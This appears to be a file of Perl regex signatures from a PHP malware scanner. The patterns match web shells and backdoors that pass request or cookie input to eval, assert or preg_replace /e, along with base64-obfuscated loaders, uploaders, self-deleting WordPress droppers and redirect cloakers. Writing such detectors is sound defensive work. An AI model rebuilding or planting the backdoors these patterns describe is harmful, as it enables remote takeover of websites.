qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_repl\"\.\"ace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\"preg\"\.\"\_rep\"\.\"lace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\"\.\"\_rep\"\.\"lace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?error\_reporting\(0\)\;.+?\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?if\s+\(preg\_match\(\'\/googlebot\|slurp.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$([A-z0-9]{1,10})\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+if\(\$\_GET\[\".+?\(\$\_FILES\[\"uploadedfile\"\].+?<\/form>/is,
qr/<\?php\s+\$\{.+?\=\@unserialize\(decode\(get\_param.+?\]\}\;\}\s+\?>/is,
qr/<\?php.+?define\(\'\_JEXEC\'\,\s+\'([A-z0-9]{100,}).+?<\/form>\'\;\s+\?>/is,
qr/<\?php\s+\/\*\s+DO.+?class\s+ADODB\_Pager.+?\$pager\->render\_pagelinks\(\)\;/is,
qr/\#\!\/usr\/bin\/env\s+php\s+<\?php.+?private\s+function\s+extractFile\(\$info\).+?\_\_HALT\_COMPILER\(\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+if\s+\(isset\(\$\_GET\[\"ping\"\]\)\s+and\s+\$\_GET\[\"ping\"\]\s+\=\=\s+\(\"ping\_host\"\)\)\s+\{.+?\}\s+else\s+\{\s+echo\s+\"false\"\;\s+\}\s+\}\s+\?>/is,
qr/RewriteEngine\s+on\s+RewriteCond\s+\%\{HTTP\_USER\_AGENT\}\s+android\s+\[NC\,OR\].+?RewriteRule\s+\^\(\.\*\)\$\s+http\:\/\/sswim\.ru\s+\[L\,R\=302\]/is,
qr/<\?php\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?\$domain\s+\=\s+\'([A-z0-9]{1,20})\.liveupdates\.host\'\;.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$([A-z0-9]{1,10})\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/include\s+\"\\x.+?php\"\;.+?eval\(base64\_decode\(.+?\)\)\;/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\s+\{\s+\$([A-z0-9]{1,20})\=gzinflate\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\;\s+for\(\$i\=0\;\$i<strlen\(\$([A-z0-9]{1,20})\)\;\$i\+\+\)\s+\{\s+\$([A-z0-9]{1,20})\[\$i\]\s+\=\s+chr\(ord\(\$([A-z0-9]{1,20})\[\$i\]\)\-1\)\;\s+\}\s+return\s+\$([A-z0-9]{1,20})\;\s+\}eval\(([A-z0-9]{1,20})\(.+?\)\)\;\?>/is,
qr/<\?php\s+\$randStr\s+\=\s+str\_shuffle\(.+?if\(is\_dir\(\$RootDir\s+\.\s+\"\/wp\-admin\"\)\)\{.+?\}\s+unlink\(\"\.\/test\.php\"\)\;/is,
qr/<\?\s+\$GLOBALS\[.+?\]\=Array\(base64\_decode\(.+?\)\,base64\_decode\(.+?\)\,base64\_decode\(.+?\)\)\;\s+\?><\?\s+function.+?\=Array\(.+?return\s+base64\_decode\(.+?\]\)\;\}\s+\?><\?php\s+\$GLOBALS\[.+?\)\)eval\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors\'\,\s+0\)\;\@set\_time\_limit\(3600\)\;.+?if\(isset\(.+?echo\s+\'\#ok\#\'\;.+?return\s+\$dir\;\s+\}\s+\/\//is,
qr/<\?php\s+if\(\s+isset\(\$\_REQUEST\[\"test\_url\"\]\)\s+\)\{.+?if\s+\(file\_exists\(\"wp\-content\"\)\).+?unlink\(\$scriptname\)\;\s+\?>/is,
qr/<\?php\s+echo\"Hello\,\s+Dollys\"\;error\_reporting\(0\)\;if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\s+\&\&\s+md5\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\s+\=\=\s+\'([A-z0-9]{20,})\'\s+\&\&\s+isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\s+eval\(base64\_decode\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\;\?>/is,
qr/<\?php\s+\$RootDir\s+\=\s+\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\;.+?if\s+\(\!\s+is\_dir\s+\(\s+\$RootDir\.\"\/wp\-content\"\s+\)\).+?\$str\=\'<\?php\s+if\(\$\_GET\[.+?unlink\(\"\.\/([A-z0-9]{1,20})\.php\"\)\;/is,
qr/<\?php\s+if\(\$\_GET\[\".+?<\/form><\?php\s+\}\s+\?>/is,
qr/\?php\s+\/\*\s+\(c\)\s+2005.+?\=base64\_decode\(\$.+?for\(\$i\=0\;\s+\$i<strlen\(\$.+?\=\@gzinflate\(strrev\(\$.+?\)\;\s+\}\s+\?>/is,
qr/if\(isset\(\$\_REQUEST\[\'.+?\$array\_name\s+\.\=\s+\$alphabet\[\$.+?\/\/\s+MALWARE\s+\$([A-z0-9]{1,20})\(\)\;\s+exit\(\)\;\s+\}/is,
qr/\$alphabet\s+\=\s+\".+?\$string\s+\=\s+\".+?\$array\_name\s+\=\s+\"\"\;.+?\$array\_name\s+\.\=\s+\$alphabet\[\$.+?strrev\(\"noi\"\.\"tcnuf\"\.\"\_eta\"\.\"erc\"\)\;.+?\/\/\s+MALWARE\s+\$([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+error\_reporting\(E\_ERROR\)\;.+?\$fp\=fopen\(\$filepath\,\"w\"\)\;.+?echo\s+\"uploaded\"\;\s+\}\s+\?>/is,
qr/<\?php\s+error\_reporting\(E\_ERROR\)\;.+?\$fp\=fopen\(\$filename\,\"w\"\)\;.+?echo\s+\"publish\s+success\"\;\s+\?>/is,
qr/<\?php\s+array\_map\(\"ass.+?rt\"\,\(array\)\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\?>/is,
qr/<\?php\s+\@eval\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\?>/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;\s+charset\=utf\-8\'\)\;\s+\$.+?\=urldecode\(.+?\)\;exit\(\)\;\}\}.+?\]\(\)\;\?>/is,
qr/<\?php\s+function\s+selfURL\(.+?function\s+myshellexec\(\$cmd\).+?\$proxy\_shit\=.+?c79shexit\(\)\;\s+\?>/is,
qr/<\?\s+if\s+\(isset\(\$\_POST\[\'action\'\]\).+?if\s+\(\$action\=\=\"send\"\).+?print\s+\"\-\=ok\=\-\"\;\s+\}\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"as\"\.\"se\"\.\"rt\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_replace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"pr\"\.\"eg\"\.\"\_r\"\.\"ep\"\.\"la\"\.\"ce\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"ass\"\.\"ert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_rep\"\.\"lace\"\;\/\*([A-z0-9]{1,20})\*\/\$\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"ass\"\.\"ert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"preg\_replace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"as\"\.\"se\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"pre\"\.\"g\_r\"\.\"epl\"\.\"ace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_repl\"\.\"ace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\"\.\"\_rep\"\.\"lace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"preg\_rep\"\.\"lace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"assert\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"preg\_rep\"\.\"lace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
